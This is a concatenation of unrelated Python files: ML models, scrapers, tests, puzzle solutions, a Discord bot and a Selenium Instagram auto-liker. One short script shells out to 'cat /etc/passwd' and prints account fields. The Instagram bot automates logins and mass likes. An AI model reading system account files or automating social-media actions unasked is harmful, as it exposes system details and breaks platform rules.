W = self._init([self._answer_size, self._embedding_size])
self.W = tf.Variable(W, name="W")
self.A_1 = tf.Variable(A, name="A")
tf.summary.histogram('W', self.W)
tf.summary.histogram('A_1', self.A_1)
self.C = []
for hopn in range(self._hops):
with tf.variable_scope('hop_{}'.format(hopn)):
self.C.append(tf.Variable(C, name="C"))
tf.summary.histogram('hop_{}'.format(hopn), self.C[-1])
# Dont use projection for layerwise weight sharing
# self.H = tf.Variable(self._init([self._embedding_size, self._embedding_size]), name="H")
# Use final C as replacement for W
# self.W = tf.Variable(self._init([self._embedding_size, self._vocab_size]), name="W")
self._nil_vars = set([self.A_1.name] + [x.name for x in self.C])
def _inference(self, queries):
with tf.variable_scope(self._name):
# Use A_1 for thee question embedding as per Adjacent Weight Sharing
q_emb = self.A_1 * queries
u_0 = tf.reduce_sum(q_emb, 1)
u = [u_0]
for hopn in range(self._hops):
if hopn == 0:
m_emb_A = self.A_1 * queries
m_A = tf.reduce_sum(m_emb_A, 1)
else:
with tf.variable_scope('hop_{}'.format(hopn - 1)):
m_emb_A = self.C[hopn - 1] * queries
m_A = tf.reduce_sum(m_emb_A, 1)
# hack to get around no reduce_dot
u_temp = tf.transpose(u[-1], [0, 1])
dotted = tf.reduce_sum(m_A * u_temp, 1)
# Calculate probabilities
probs = tf.nn.softmax(dotted)
probs_temp = tf.transpose(tf.expand_dims(probs, -1), [1, 0])
with tf.variable_scope('hop_{}'.format(hopn)):
m_emb_C = self.C[hopn] * queries
m_C = tf.reduce_sum(m_emb_C, 1)
c_temp = tf.transpose(m_C, [1, 0])
o_k = tf.reduce_sum(c_temp * probs_temp, 1)
# Dont use projection layer for adj weight sharing
# u_k = tf.matmul(u[-1], self.H) + o_k
u_k = u[-1] + o_k
# nonlinearity
if self._nonlin:
u_k = nonlin(u_k)
u.append(u_k)
# Use last C for output (transposed)
with tf.variable_scope('hop_{}'.format(self._hops)):
return tf.matmul(u_k, tf.transpose(self.W, [1,0]))
def batch_fit(self, queries, answers, learning_rate):
"""Runs the training algorithm over the passed batch
Args:
learning_rate: Tensor (None, memory_size, sentence_size)
queries: Tensor (None, sentence_size)
answers: Tensor (None, vocab_size)
Returns:
loss: floating-point number, the loss computed for the batch
"""
feed_dict = {self._queries: queries, self._answers: answers, self._lr: learning_rate}
loss, _, summary = self._sess.run([self.loss_op, self.train_op, self.merge], feed_dict=feed_dict)
return loss, summary
def predict(self, queries):
"""Predicts answers as one-hot encoding.
Args:
queries: Tensor (None, sentence_size)
Returns:
answers: Tensor (None, vocab_size)
"""
feed_dict = {self._queries: queries}
return self._sess.run(self.predict_op, feed_dict=feed_dict)
def predict_proba(self, queries):
"""Predicts probabilities of answers.
Args:
queries: Tensor (None, sentence_size)
Returns:
answers: Tensor (None, vocab_size)
"""
feed_dict = {self._queries: queries}
return self._sess.run(self.predict_proba_op, feed_dict=feed_dict)
def predict_log_proba(self, queries):
"""Predicts log probabilities of answers.
Args:
queries: Tensor (None, sentence_size)
Returns:
answers: Tensor (None, vocab_size)
"""
feed_dict = {self._queries: queries}
return self._sess.run(self.predict_log_proba_op, feed_dict=feed_dict)
def load(self, checkpoint_dir):
tf.logging.warning("model start load")
with open("./data/ans.json", 'r') as pf:
self.answer = json.load(pf)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
self.saver.restore(self._sess, ckpt.model_checkpoint_path)
tf.logging.warning("model restore success")
else:
tf.logging.error("model restore wrong!")
def find_simword(self, word):
simword = ""
maxscore = 0
for index, value in enumerate(self.vacob.keys()):
score = self.word.word_sim(value, word)
if score > maxscore:
simword = value
maxscore = score
tf.logging.warning("find_simword, word is {}, simword is {}".format(word, simword))
return simword
def string_to_vec(self, string):
vector = [[0] * self._embedding_size] * self._sentence_size
strlist = cut2list(string)
for index, word in enumerate(strlist):
vecjs = self.word.word_vec(word)
vec = json.loads(vecjs)
while isinstance(vec, unicode):
vec = json.loads(vec)
vector[index] = vec
return vector
def vec_to_answer(self, maxindex):
return self.answer[maxindex]
def respond(self, query):
qvec = self.string_to_vec(query)
feed_dict = {self._queries:[qvec]}
maxindex = self._sess.run(self.predict_op, feed_dict=feed_dict)
answer = self.vec_to_answer(maxindex[0])
return answer
if __name__ == "__main__":
# for test
mdir = "./tensorboard/logs/"
conf = ConfigParser.ConfigParser()
conf.read("./data/RNN.cfg")
batch_size = int(conf.get("RNN", "batch_size"))
answer_size = int(conf.get("RNN", "answer_size"))
sentence_size = int(conf.get("RNN", "sentence_size"))
embedding_size = int(conf.get("RNN", "embedding_size"))
hops = int(conf.get("RNN", "hops"))
max_grad_norm = float(conf.get("RNN", "max_grad_norm"))
with tf.Session() as sess:
model = MemN2N(batch_size, answer_size, sentence_size, embedding_size, session=sess,
hops=hops, max_grad_norm=max_grad_norm)
model.load('./model/rnn/')
while(1):
print(model.respond(raw_input(">")))
|
from abc import ABC, abstractmethod
class Instruccion(ABC):
def __init__(self, fila, columna):
self.fila = fila
self.columna = columna
self.arreglo = False
super().__init__()
@abstractmethod
def interpretar(self, tree, table):
pass
@abstractmethod
def getNodo(self):
pass
|
import sys
sys.path.append('../STANDAR_LIBRARIES')
from URL_Lib import descargarResultadoData, descargarResultado, descargarResultadoDataSinBeautiful
from File_Lib import saveFile, saveFileExc, loadFile
import re
import requests
from bs4 import BeautifulSoup # pip install beautifulsoup4
import http.client
http.client._MAXHEADERS = 1000
#
#
# ********************************** Programa principal **********************************
#
#
def escanearProducto(url):
if (url in listaDone):
return
porce = str( ( (len(listaDone) + len(listaFallo) ) / len(listaProductos))*100);
print( porce[0:4]+ '% Escaneado ... ' +url )
conn = http.client.HTTPSConnection("www.academy.com")
headers = { }
cant =0
conn.request("GET", url, headers=headers)
res = conn.getresponse()
data = res.read()
# try:
#aaa = data.decode('unicode').encode('utf-8')
#print(data)
aaa = data.decode('utf8', 'replace')
pagina = BeautifulSoup(aaa, 'html.parser');
try:
parentSKU = pagina.prettify().split('"parent_sku": "')[1].split('"')[0];
except:
listaFallo.append(url + '; No parentSKU')
saveFile('productos_fail.csv', listaFallo)
return
titulo = pagina.find_all('h1', class_='rpdp-product-title')[0].text
marca = pagina.prettify().split('itemprop="brand">')[1].split('<')[0].strip()
descripcion = pagina.prettify().split('itemprop="description">')[1].split('<')[0].strip()
categoria2 = pagina.prettify().split('id="brBreadCrum"')[1].split('value="')[1].split('"')[0].replace('&','&');
if (len(categoria2.split('|'))>3 ):
categoria = categoria2.split('|')[1] + ' --> ' + categoria2.split('|')[2] + ' --> ' + categoria2.split('|')[3]
else:
categoria = categoria2.replace('Academy|','');
# conn.request("GET", 'https://www.academy.com/shop/AYRStoreLocatorServiceCmd?lat=40.8201966&lon=-96.70047629999999&ParentSKU=' + parentSKU, headers=headers)
# res = conn.getresponse()
# data = res.read()
# aaa = data.decode("utf-8")
# paginaStock = BeautifulSoup(aaa, 'html.parser');
valores = pagina.prettify().split('catentry_id');
for yyy in valores:
if ('"Attributes" :' in yyy):
resursos = yyy.split('"Attributes" : {')[1].split('}')[0] ;
bbb = resursos.split(',');
foto0 = yyy.split('ItemImage" : "//')[1].split('"')[0] ;
fotos = yyy.split('"DescAttributes" : {')[1].split('}')[0] ;
fotos = fotos.split(',');
try:
foto1 = fotos[0].split('"')[1].replace('image_','').split('#//')[1].strip();
except:
foto1 = ''
try:
foto2 = fotos[1].split('"')[1].replace('image_','').split('#//')[1].strip();
except:
foto2 = ''
try:
foto3 = fotos[2].split('"')[1].replace('image_','').split('#//')[1].strip();
except:
foto3 = ''
item = yyy.split('mfPartNumber')[1].split(',')[0].replace('" : "','').replace('"','').strip()
sku = yyy.split('partNumber')[1].split(',')[0].replace('" : "','').replace('"','').strip()
precio = yyy.split('listPrice')[1].split(',')[0].replace('" : "','').replace('"','').replace(':','').strip()
try:
color = bbb[0].split('"')[1].replace('Color_','').strip();
except:
color = ''
try:
tamanio = bbb[1].split('"')[1].replace('Size_','').strip();
except:
tamanio = ''
listaResultados.append(parentSKU + ';' + item + ';' + sku + ';' + color + ';' + tamanio + ';' + titulo + ';' + marca + ';' + precio + ';' + descripcion + ';' + foto0 +';' + foto1 + ';' + foto2 + ';' + foto3 + ';' + categoria + ';' + url)
saveFile('productos_datos.csv', listaResultados)
listaDone.append(url)
saveFile('productos_ya_escaneados.csv', listaDone)
return;
listaProductos = []
listaProductosAux = []
loadFile('productos_links.csv', listaProductosAux)
for aa in listaProductosAux:
if aa not in listaProductos:
listaProductos.append(aa);
listaDone = []
listaResultados = []
listaFallo = []
loadFile('productos_ya_escaneados.csv', listaDone)
loadFile('productos_datos.csv', listaResultados)
for pagina in listaProductos:
try:
escanearProducto(pagina);
except KeyboardInterrupt:
print('The user abort the script.')
sys.exit()
# except UnicodeDecodeError:
# print('Fallo ' + pagina)
# listaFallo.append(pagina)
# saveFile('fallo.csv', listaFallo)
# except:
# print('Fallo ' + pagina)
# listaFallo.append(pagina)
# saveFile('fallo.csv', listaFallo)
#for prod in listaProductos:
# escanearProducto(prod);
# saveFile('pino.csv',listaResultados); |
#!/usr/bin/env python
import commands
pass_string = commands.getoutput('cat /etc/passwd')
pass_list = pass_string.split('\n')
data = dict()
value = []
value_1 = []
for line in pass_list:
if line.startswith('#'):
continue
line_list = line.split(':')
value_1 = [ line_list[2], line_list[3], line_list[-1] ]
data[line_list[0]] = value_1
print(data)
|
import os
import sys
import tensorflow as tf
import cnn_vgg16
import nn_config
DEFAULT_IMG_CATEGORIES_FILE = os.path.join('DATA', 'Anno', 'list_category_cloth.txt')
DEFAULT_IMG_ATTR_FILE = os.path.join('DATA', 'Anno', 'list_attr_cloth.txt')
DEFAULT_CATEGORY_MODEL_DIR = "category_convnet_model"
DEFAULT_ATTRIBUTE_MODEL_DIR = "attribute_tagging_convnet_model"
DEFAULT_THRESHOLD = 0.7
class ImageProcessor(object):
def __init__(self,
category_model_dir=DEFAULT_CATEGORY_MODEL_DIR,
attribute_model_dir=DEFAULT_ATTRIBUTE_MODEL_DIR,
attribute_threshold=DEFAULT_THRESHOLD,
category_name_file=DEFAULT_IMG_CATEGORIES_FILE,
attribute_name_file=DEFAULT_IMG_ATTR_FILE):
if not os.path.exists(category_model_dir):
error_msg = "Category model directory ({}) does not exist"
raise ValueError(error_msg.format(category_model_dir))
self.category_classifier = tf.estimator.Estimator(
model_fn=cnn_vgg16.category_classifier_model,
model_dir=category_model_dir)
self.attribute_classifier = tf.estimator.Estimator(
model_fn=cnn_vgg16.attribute_tagging_model,
model_dir=attribute_model_dir)
self.attribute_threshold = attribute_threshold
self.category_name = [name for name, number in nn_config.SELECTED_CATEGORIES]
self.attribute_name = ImageProcessor._get_names(attribute_name_file)
@staticmethod
def _get_names(filename):
if not os.path.exists(filename):
raise RuntimeError("Name file ({}) does not exist".format(filename))
lines = []
with open(filename) as f:
lines = f.readlines()
def _get_name_from_line(line):
words = line.split()
all_but_last = words[:-1]
return " ".join(all_but_last)
return [_get_name_from_line(line) for line in lines[2:]]
@staticmethod
def _build_neural_net_input(img_filename):
dataset = tf.data.Dataset.from_tensor_slices([img_filename])
return dataset.map(cnn_vgg16.pre_process_image_filename)
def predict_category(self, img_filename):
input_fn = lambda: ImageProcessor._build_neural_net_input(img_filename)
category_spec = self.category_classifier.predict(input_fn=input_fn)
predictions = [p for p in category_spec]
img_class = None
try:
img_class = predictions[0]["classes"]
except KeyError:
raise RuntimeError("Prediction dictionary is malformed: " + str(predictions[0]))
img_class = int(img_class)
if img_class not in range(len(self.category_name)):
raise RuntimeError("Predicted an invalid class: {}".format(img_class))
return img_class, self.category_name[img_class]
def predict_attributes(self, img_filename):
input_fn = lambda: ImageProcessor._build_neural_net_input(img_filename)
attribute_spec = self.attribute_classifier.predict(input_fn=input_fn)
attribute_spec_results = [p for p in attribute_spec]
attribute_probabilities = attribute_spec_results[0].get("probabilities", [])
attributes = [i for i, p in enumerate(attribute_probabilities)
if p >= self.attribute_threshold]
attribute_names = [self.attribute_name[a] for a in attributes]
return attributes, attribute_names
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Pass in the image filepath")
exit(1)
if len(sys.argv) > 2:
image_processor = ImageProcessor(attribute_threshold=float(sys.argv[2]))
else:
image_processor = ImageProcessor()
img_path = sys.argv[1]
category, category_name = image_processor.predict_category(img_path)
output_msg = "The predicted category for image " \
"{} is {} ({})".format(img_path, category, category_name)
print(output_msg)
attributes, names = image_processor.predict_attributes(img_path)
output_msg = "The predicted attributes are " \
"{} ({})".format(attributes, names)
print(output_msg)
|
import numpy as np
def norm_cm(cm):
'''
compute skew-normalized f1 score from confusion matrix
:param cm: confusion matrix
:return: f1n - skew-normalized f1 score
pn - skew-normalized precision
rn - skew-normalized recall
ncm - skew-normalized confusion matrix
s - the skewness factor
'''
num_pos = np.sum(cm[:, 0])
num_neg = np.sum(cm[:, 1])
if num_pos == 0:
ncm = np.zeros((2,2),dtype=np.int32)
print("no positive samples found")
return ncm
skew = num_neg/ float(num_pos)
ncm = np.array([cm[:, 0], cm[:,1]/skew]).T
return ncm, skew
def cm2f1n(cm):
'''
cm2f1n.m
Compute skew-normalized f1 score from confusion matrix
:param cm:
:return:
'''
ncm, s = norm_cm(cm)
f1n = 0
pn = 0
rn = 0
if ncm[0,0] > 0: # TP has to be > 0
pn = ncm[0,0]/ np.sum(ncm[0, :])
rn = ncm[0,0]/ np.sum(ncm[:, 0])
f1n = 2 * pn * rn / (pn + rn)
return f1n, pn, rn, ncm, s
|
class Solution:
def countBits(self, num):
array = [0]
for i in range(1, num + 1):
array.append(array[i // 2] + i % 2)
return array
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 8 20:29:24 2020
@author: rahul
Here we are implementing some dimentionality reduction for the auto-insurance prediction problem
"""
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import SelectFromModel
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import normalize
from sklearn.metrics import classification_report, f1_score
from sklearn.model_selection import train_test_split, KFold, cross_val_score
df = pd.read_csv("Auto_Data.csv")
#print(df.head())
org_df = df.copy()
# define function for getting corelation variables
def find_corr_features(df_corr, pos_corr_thresh = 0.5, neg_corr_thresh = -0.5):
corr_feat_pos = []
corr_feat_neg = []
for idx in df_corr.index:
for col in df_corr.columns:
if idx == col:
break
# print("corr_values[{},{}]={}".format(idx,col,corr_values.loc[idx,col]))
if df_corr.loc[idx,col] < neg_corr_thresh:
# print("df_corr[{},{}]={}".format(idx,col,df_corr.loc[idx,col]))
# print("Found negative correlation")
corr_feat_neg.append((idx,col,df_corr.loc[idx,col]))
elif df_corr.loc[idx,col] > pos_corr_thresh:
# print("df_corr[{},{}]={}".format(idx,col,df_corr.loc[idx,col]))
# print("Found positive correlation")
corr_feat_pos.append((idx,col,df_corr.loc[idx,col]))
return (corr_feat_pos,corr_feat_neg)
# define function for plotting pie charts for categorical columns
def plot_pie_charts(df_to_plot, cols_to_plot):
for col in cols_to_plot:
plt.figure()
df_to_plot[col].value_counts().plot(kind='pie', figsize=(5,5), autopct='%1.2f%%')
plt.title(col)
# **************** Clean the data *******************
# drop duplicates
df = df.drop_duplicates()
print(df.shape)
df.drop('id',axis=1, inplace=True) # drop the id column as its not needed
# find out if there are any null/missing values
# Note - In this example the value -1 is treated as null. So we replace all -1 values with np.nan in the dataset
print(df.isin(['-1']).sum(axis=0))
df.replace(-1,np.nan,inplace=True)
print(df.isnull().sum())
#print(df.isna().sum())
# print percentages
print(df.isnull().sum()/len(df) * 100)
# remove those columns which have more than 60% values missing
# saving missing values in a variable
a = df.isnull().sum()/len(df)*100
# saving column names in a variable
variables = df.columns
drop_variables = [ ]
for i in range(0,len(df.columns)):
if a[i] > 60: #setting the threshold as 60%
drop_variables.append(variables[i])
df.drop(drop_variables, axis=1, inplace=True)
print(df.shape)
print(df.isnull().sum()/len(df) * 100)
label = df.pop('target')
# ************* Exploratory data analysis and pre-processing ****************************
columns_list = df.columns
# segregate the features into categorical, binary and numerical features
cat_cols = []
num_cols = []
bin_cols = []
for col_name in columns_list:
if 'bin' in col_name:
bin_cols.append(col_name)
elif 'cat' in col_name:
cat_cols.append(col_name)
else:
num_cols.append(col_name)
print(f"Binary colums={len(bin_cols)} , Categorical columns={len(cat_cols)}, Numeric columns={len(num_cols)}")
# Convert categorical and binary columns as categorical data-type
df[cat_cols] = df[cat_cols].astype('category')
df[bin_cols] = df[bin_cols].astype('category')
# plot pycharts for all categorical columns to check for skewed data
plot_pie_charts(df, cat_cols)
# drop all columns which are more than 90% skewed
df.drop(['ps_car_07_cat', 'ps_car_10_cat'], axis=1,inplace=True)
cat_cols.remove('ps_car_07_cat')
cat_cols.remove('ps_car_10_cat')
# plot pycharts for all binary columns to check for skewed data
plot_pie_charts(df, bin_cols)
# drop all columns which are more than 90% skewed
df.drop(['ps_ind_10_bin', 'ps_ind_11_bin', 'ps_ind_12_bin', 'ps_ind_13_bin'], axis=1,inplace=True)
bin_cols.remove('ps_ind_10_bin')
bin_cols.remove('ps_ind_11_bin')
bin_cols.remove('ps_ind_12_bin')
bin_cols.remove('ps_ind_13_bin')
# Split the data into train and test sets
train_df, test_df, label_train, label_test = train_test_split(df, label, random_state=101, stratify=label, test_size=0.2)
# Now we have to impute those values which are missing
# For continuous values we would impute them with mean/median
imputer1 = SimpleImputer(missing_values= np.nan, strategy='mean')
train_df[num_cols] = imputer1.fit_transform(train_df[num_cols])
test_df[num_cols] = imputer1.transform(test_df[num_cols])
print(train_df.isnull().sum()/len(train_df) * 100)
# For categorical variables, we would impute them with their mode
imputer2 = SimpleImputer(missing_values=np.nan, strategy='most_frequent')
train_df[cat_cols] = imputer2.fit_transform(train_df[cat_cols])
test_df[cat_cols] = imputer2.transform(test_df[cat_cols])
print(train_df.isnull().sum()/len(train_df) * 100)
# Now there are no missing values.
# Note that for training data we use fit_transform, but for test-data we use only transform
# Use the low variance method to remove columns having low variance
# First normaize the data. Note that Standard scaler cannot be used here since it makes all variances uniform
train_df[num_cols] = normalize(train_df[num_cols])
variance = train_df[num_cols].var()
# drop all variables having variance less than 0.006
drop_vari = []
for i in range(0, len(variance)):
if variance[i] <= 0.006:
drop_vari.append(num_cols[i])
train_df.drop(drop_vari,axis=1, inplace=True)
test_df.drop(drop_vari,axis=1, inplace=True)
for item in drop_vari:
num_cols.remove(item)
# Now we check for correlation between the nemeric variables and drop any variables having correlation great than 0.5 or 0.6
# plot correlation matrix for numeric columns
corr_matrix = df[num_cols].corr()
plt.figure(figsize=(20,10))
sns.heatmap(corr_matrix,cmap="BrBG",annot=True)
# We remove one of the variables having correlation more than 0.5
# Note - here we dont have any highly corelated features as seen in the correlation matrix
corr_feat_pos_all, corr_feat_neg_all = find_corr_features(corr_matrix)
if len(corr_feat_pos_all) > 0:
print("Features with positive correlation:")
print(corr_feat_pos_all)
for (f1,f2,corr) in corr_feat_pos_all:
print("Dropping feature={}".format(f1))
train_df = train_df.drop(columns=f1, errors='ignore')
test_df = test_df.drop(columns=f1, errors='ignore')
num_cols.remove(f1)
else:
print("0 features with positive correlation")
if len(corr_feat_neg_all) > 0:
print("Features with negative correlation:")
print(corr_feat_neg_all)
for (f1,f2,corr) in corr_feat_neg_all:
print("Dropping feature={}".format(f1))
train_df = train_df.drop(columns=f1, errors='ignore')
test_df = test_df.drop(columns=f1, errors='ignore')
num_cols.remove(f1)
else:
print("0 features with negative correlation")
#train_df[num_cols].hist()
# Now we apply MinMax scaler to the numerical columns
std_scaler = MinMaxScaler()
train_df[num_cols] = std_scaler.fit_transform(train_df[num_cols])
test_df[num_cols] = std_scaler.transform(test_df[num_cols])
#train_df[num_cols].hist()
# Now we check if the output label is skewed or not
label_train.value_counts().plot(kind='pie', figsize=(5,5), autopct='%1.2f%%')
# We see that 96% of the labels are skewed towards 0. We need to upsample or down-weight for 1
# Create a logistic regression model.The class_weight='balanced' automatically adjusts the weights for the target classes.
lreg_model = LogisticRegression(max_iter=500,class_weight='balanced')
print("Training log reg model....")
lreg_model.fit(train_df,label_train)
print("Evaluate the model with test results")
score = lreg_model.score(test_df,label_test)
print("Score on test data :", score)
# Make predictions on test data
label_pred = lreg_model.predict(test_df)
print("Classification report:")
print(classification_report(label_test,label_pred))
print("F1 score:", f1_score(label_test,label_pred))
# **** Now we check for variables which have high coefficients and consider only those variables
print("Logistic regression coffecients:")
print(lreg_model.coef_)
X = train_df.columns
Xl = range(len(X))
C = lreg_model.coef_.reshape(-1)
# plot the values of the coefficients
plt.figure(figsize=(8,6))
plt.bar(Xl,abs(C))
# Create a data-frame with the variables and their cofficients
coeff_df = pd.DataFrame({
'variables': X ,
'coefficients': abs(C)
})
# Get the list of cofficients which have values greater than a particular value
coeff_cols = coeff_df[(coeff_df.coefficients > 0.3)]
# Take only a subset of train_df which contains only tha variables having high coefficients
train_df = train_df[coeff_cols['variables'].values]
test_df = test_df[coeff_cols['variables'].values]
# Now train the logistic regression model on the reduced subset of columns
print("Training logisitc reg model with selected columns ....")
logisreg_model = LogisticRegression(max_iter=1000,class_weight='balanced')
logisreg_model.fit(train_df,label_train)
print("Evaluate the model with test results")
score = logisreg_model.score(test_df,label_test)
print("Score on test data :", score)
# Make predictions on test data
label_pred = logisreg_model.predict(test_df)
print("Classification report on test data:")
print(classification_report(label_test,label_pred))
print("Test F1 score:", f1_score(label_test,label_pred))
pred_train = logisreg_model.predict(train_df)
print("Train_F1 score:", f1_score(label_train,pred_train))
print("Classification report on train data:")
print(classification_report(label_train,pred_train))
#%%
# use Random forest classifier to find out most important features
#https://www.kdnuggets.com/2015/05/7-methods-data-dimensionality-reduction.html
print("Building random forest....")
my_importance_model = RandomForestClassifier(random_state=1, max_depth=10)
my_importance_model.fit(train_df, label_train)
print(my_importance_model.feature_importances_)
print("plotting top 10 fetures......")
plt.figure(figsize=(10,10))
feat_importances = pd.Series(my_importance_model.feature_importances_, index = train_df.columns)
feat_importances.nlargest(10).plot(kind='barh');
plt.xlabel('Relative Importance')
print("Selecting top 10 features .....")
# Select top 10 important features from the model
feature = SelectFromModel(my_importance_model)
Fit = feature.fit_transform(train_df,label_train)
# Now run logistic regression with the new selected list of features
print("Training log reg model....")
lreg_model.fit(Fit,label_train)
test_df = feature.transform(test_df)
print("Evaluate the model with test results")
score = lreg_model.score(test_df,label_test)
print("Score on test data :", score)
# Make predictions on test data
label_pred = lreg_model.predict(test_df)
print("Classification report:")
print(classification_report(label_test,label_pred))
print("F1 score:", f1_score(label_test,label_pred))
|
from scadapy import NodeId
from scada_test import BaseTest
class PingTest(BaseTest):
def test_ping(self):
data_items = self.client.node(NodeId.DataItems)
assert data_items == NodeId.DataItems
assert data_items.browse_name == "DataItems"
def test_data_items(self):
data_items = self.client.node(NodeId.DataItems)
creates = data_items.targets(NodeId.Creates)
assert NodeId.DataGroupType in creates
assert NodeId.DataItemType in creates
def test_data_group_type(self):
data_group_type = self.client.node(NodeId.DataGroupType)
assert data_group_type.node_id == NodeId.DataGroupType
assert data_group_type.browse_name == "DataGroupType"
creates = data_group_type.targets(NodeId.Creates)
assert NodeId.DataGroupType in creates
assert NodeId.DataItemType in creates |
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
import time
class bot:
def __init__(self,email,password):
self.driver = webdriver.Chrome("D:\Sourav (softwares)\chromedriver.exe")
self.email=email
self.password=password
def login(self):
driver=self.driver
driver.get("https://www.instagram.com/")
driver.find_element_by_xpath("//button[contains(text(),'Log in with Facebook')]").click()
email=driver.find_element_by_xpath("//input[@name='email']")
email.send_keys(self.email)
password=driver.find_element_by_xpath("//input[@name='pass']")
password.send_keys(self.password)
password.send_keys(Keys.RETURN)
time.sleep(6)
notnow=driver.find_element_by_xpath("//button[contains(@class,'HoLwm')]")
notnow.click()
def like(self,hashtag):
driver=self.driver
driver.get("https://www.instagram.com/explore/tags/"+hashtag+"/")
time.sleep(2)
for i in range(1,6):
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(2)
hrefs=driver.find_elements_by_tag_name("a")
pics=[elems.get_attribute("href") for elems in hrefs]
pics=[href for href in pics]
print(hashtag+"="+str(len(pics)))
count=0
for links in pics:
driver.get(links)
try:
driver.find_element_by_xpath("//button[contains(@class,'dCJp8 afkep _0mzm-')]//span[contains(@class,'glyphsSpriteHeart__outline__24__grey_9 u-__7')]").click()
count=count+1
print("Liking Pic No="+str(count))
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(18)
except Exception as e:
time.sleep(2)
sourav= bot("email","password")
sourav.login()
sourav.like("hashtag")
|
name = input("Your name? ")
age = input("Age ")
print(name + " " + str(age))
|
# AdventOfCode 2019 day 4 pt 1
# https://adventofcode.com/2019/day/4
# started 7:15-paused 8:00
# started over at 9:05 - 10:00
low, high = [171309,643603]
possiblepasswords = 0
for i in range(low, high+1):
previous = 0
hasdoubledigit = False
# Loop though each digit in the number
for strdigit in str(i):
# check if bigger than previous, if not then break
if int(strdigit) < previous:
break
# check for double digits
elif int(strdigit) == previous:
hasdoubledigit = True
previous = int(strdigit)
# forloop fell though (break)- heres the values that worked out- still for-loop'ing
# https://book.pythontips.com/en/latest/for_-_else.html
else:
if hasdoubledigit:
# print(i, doubledigit)
possiblepasswords += 1
print(possiblepasswords) # 1625
|
from .Utils import *
from discord.ext import commands
from dice_roller.DiceThrower import DiceThrower
from card_picker.Deck import Deck
from card_picker.Card import *
from flipper.Tosser import Tosser
from flipper.Casts import *
class Games(commands.Cog):
"""Game tools! Custom RNG tools for whatever."""
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True)
async def dice(self, ctx, roll='1d1'):
"""Roll some dice! Great for RPG and such.
See here for the roll syntax: https://github.com/pknull/rpg-dice"""
msg = DiceThrower().throw(roll)
print(msg)
if type(msg) is dict:
if msg['natural'] == msg['modified']:
msg.pop('modified', None)
title = '🎲 Dice Roll'
embed = make_embed(title, msg)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing dice.")
@commands.command(pass_context=True)
async def card(self, ctx, card: str, count=1):
"""Deal a hand of cards. Doesn't currently support games.
cards: [standard,shadow,tarot,uno]"""
card_conv = {
'standard' : StandardCard,
'shadow' : ShadowCard,
'tarot' : TarotCard,
'uno' : UnoCard
}
if len(card) > 0:
card_type = card
else:
card_type = 'standard'
cards = card_conv[card_type]
deck = Deck(cards)
deck.create()
deck.shuffle()
hand = deck.deal(count)
if type(hand) is list:
title = '🎴 Card Hand ' + card_type[0].upper() + card_type[1:]
embed = make_embed(title, hand)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing cards.")
@commands.command(pass_context=True)
async def coin(self, ctx, count=1):
"""Flip a coin. Add a number for multiples."""
tosser = Tosser(Coin)
result = tosser.toss(count)
if type(result) is list:
title = '⭕ Coin Flip'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing coin.")
@commands.command(pass_context=True)
async def eightball(self, ctx, count=1):
"""Rolls an eightball!"""
tosser = Tosser(EightBall)
result = tosser.toss(count)
if type(result) is list:
title = '🎱 Eightball'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing eightball.")
@commands.command(pass_context=True)
async def killer(self, ctx, count=1):
"""Pick a Dead By Daylight Killer!"""
class Killer:
SIDES = ['Trapper', 'Wraith', 'Hillbilly', 'Nurse', 'Shape', 'Hag', 'Doctor', 'Huntress', 'Cannibal',
'Nightmare', 'Pig', 'Clown', 'Spirit', 'Legion', 'Plague', 'Ghost Face']
tosser = Tosser(Killer)
result = tosser.toss(count, True)
if type(result) is list:
title = '🗡 Killers'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing killer.")
@commands.command(pass_context=True)
async def sperks(self, ctx, count=4):
"""Pick a Dead By Daylight Survivor Perk!"""
class SPerks:
SIDES = ['Ace in the Hole', 'Adrenaline', 'Aftercare', 'Alert',
'Autodidact', 'Balanced Landing', 'Boil Over', 'Bond',
'Borrowed Time', 'Botany Knowledge', 'Breakdown',
'Buckle Up', 'Calm Spirit', 'Dance With Me',
'Dark Sense', 'Dead Hard', 'Decisive Strike', 'Déjà Vu',
'Deliverance', 'Detective\'s Hunch', 'Distortion',
'Diversion', 'Empathy', 'Flip-Flop', 'Head On', 'Hope', 'Iron Will',
'Kindred', 'Leader', 'Left Behind', 'Lightweight',
'Lithe',
'Mettle of Man', 'No Mither', 'No One Left Behind',
'Object of Obsession', 'Open-Handed', 'Pharmacy',
'Plunderer\'s Instinct',
'Poised', 'Premonition', 'Prove Thyself',
'Quick & Quiet', 'Resilience', 'Saboteur', 'Self-Care',
'Slippery Meat',
'Small Game', 'Sole Survivor', 'Solidarity',
'Spine Chill', 'Sprint Burst', 'Stake Out',
'Streetwise', 'This Is Not Happening',
'Technician', 'Tenacity', 'Up the Ante', 'Unbreakable',
'Urban Evasion', 'Vigil', 'Wake Up!', 'We\'ll Make It',
'We\'re Gonna Live Forever',
'Windows of Opportunity']
tosser = Tosser(SPerks)
result = tosser.toss(count, True)
if type(result) is list:
title = '🔣 Survivor Perks'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing survivor perks.")
@commands.command(pass_context=True)
async def kperks(self, ctx, count=4):
"""Pick a Dead By Daylight Killer Perk!"""
class KPerks:
SIDES = ['A Nurse\'s Calling', 'Agitation', 'Bamboozle', 'Barbecue & Chill',
'Beast of Prey', 'Bitter Murmur', 'Bloodhound', 'Blood Warden',
